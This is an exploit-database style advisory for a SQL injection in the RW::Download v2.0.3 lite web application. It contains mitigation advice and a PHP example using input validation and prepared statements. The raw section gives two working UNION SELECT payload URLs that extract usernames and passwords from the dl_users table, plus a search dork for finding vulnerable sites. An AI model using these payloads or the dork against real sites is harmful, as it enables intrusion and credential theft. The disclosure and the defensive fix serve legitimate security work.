Vendor: RW::Download
By: k1tk4t
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: RW::Download
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE:
CPE: a:rwscripts:rw::download:2.0.3
Metasploit:
Other Scripts:
Platforms Tested:
2007

RW::Download v2.0.3 lite – Remote SQL Injection

The RW::Download v2.0.3 lite web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by manipulating the 'dlid' and 'cid' parameters in the 'index.php' file. By using a UNION SELECT statement, the attacker can extract sensitive information such as usernames and passwords from the 'dl_users' table.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing SQL queries. Additionally, implementing prepared statements or parameterized queries can help prevent SQL injection attacks.
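The following is an added example of the mitigation described above, not code from RW::Download: a hypothetical replacement for the part of index.php that reads the 'dlid' and 'cid' parameters. It validates each id as a positive integer before use and runs the lookups as PDO prepared statements, so the parameter value can never become part of the SQL text. The table and column names (dl_downloads, cid, title, filename) and the in-memory SQLite database are assumptions made so the script runs stand-alone; the site itself would use its MySQL connection.

```php
<?php
// Added example (not RW::Download's own code). Hypothetical handler for the
// 'dlid' and 'cid' parameters of index.php. Table/column names are assumed;
// an in-memory SQLite database stands in for the site's MySQL database.

// The vulnerable pattern the advisory describes, shown for contrast only:
//   $sql = "SELECT ... FROM dl_downloads WHERE dlid = " . $_GET['dlid'];
// The raw parameter is pasted into the SQL text, so a value such as
// "-9 UNION SELECT ..." is executed as SQL instead of being treated as a number.

function validateId(string $raw): ?int
{
    // Allow-list validation: ids must be positive integers. Anything else
    // (including any string carrying SQL keywords) is rejected here.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetchDownload(PDO $db, string $rawDlid): ?array
{
    $dlid = validateId($rawDlid);
    if ($dlid === null) {
        return null;
    }
    // Parameterized query: the SQL text is constant; the value is bound
    // separately and cannot change the structure of the statement.
    $stmt = $db->prepare('SELECT dlid, title, filename FROM dl_downloads WHERE dlid = :dlid');
    $stmt->bindValue(':dlid', $dlid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function fetchCategoryDownloads(PDO $db, string $rawCid): array
{
    $cid = validateId($rawCid);
    if ($cid === null) {
        return [];
    }
    $stmt = $db->prepare('SELECT dlid, title FROM dl_downloads WHERE cid = :cid ORDER BY title');
    $stmt->bindValue(':cid', $cid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// --- Constructed sample data so the example runs offline ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// On the site's MySQL connection, also disable client-side emulation so the
// server performs the prepare: $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE dl_downloads (dlid INTEGER PRIMARY KEY, cid INTEGER, title TEXT, filename TEXT)');
$db->exec("INSERT INTO dl_downloads VALUES (1, 1, 'Example A', 'a.zip'), (2, 1, 'Example B', 'b.zip')");

// A normal request: the row for dlid 1 is returned.
var_dump(fetchDownload($db, '1'));
// The advisory's payload shape: rejected by validateId, never reaches the database.
var_dump(fetchDownload($db, '-9 UNION SELECT null,null,null FROM dl_users/*'));
// Category listing with a valid id, then with a non-numeric value (empty result).
var_dump(fetchCategoryDownloads($db, '1'));
var_dump(fetchCategoryDownloads($db, '1 OR 1=1'));
```

The two layers are independent: even if the integer check were omitted, the bound parameter is sent as data rather than as query text, which is what closes the injection. The validation step is still worth keeping because it rejects malformed requests early and gives a clear place to log them.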

Exploit-DB raw data:

########################################################################
# RW::Download v2.0.3 lite - Remote SQL Injection
# Vendor           : http://www.rwscripts.com/
# Discovered by    : k1tk4t - k1tk4t[4t]newhack.org
# Location         : Indonesia  --  #newhack[dot]org @ irc.dal.net
# Dork             : "Powered by RW::Download v2.0.3 lite"
########################################################################

http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*

http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*

########################################################################
Thanks to:
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
and all friends in the security & hacking community
-----------------------
-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
all members of newhack[dot]org
-----------------------
all members of www.echo.or.id
-----------------------
all members of www.yogyafree.net
-----------------------
all members of www.sekuritionline.net
-----------------------
all members of www.kecoak-elektronik.net
-----------------------
all Indonesian hacker & security communities
Love the Indonesian language

# milw0rm.com [2007-09-07]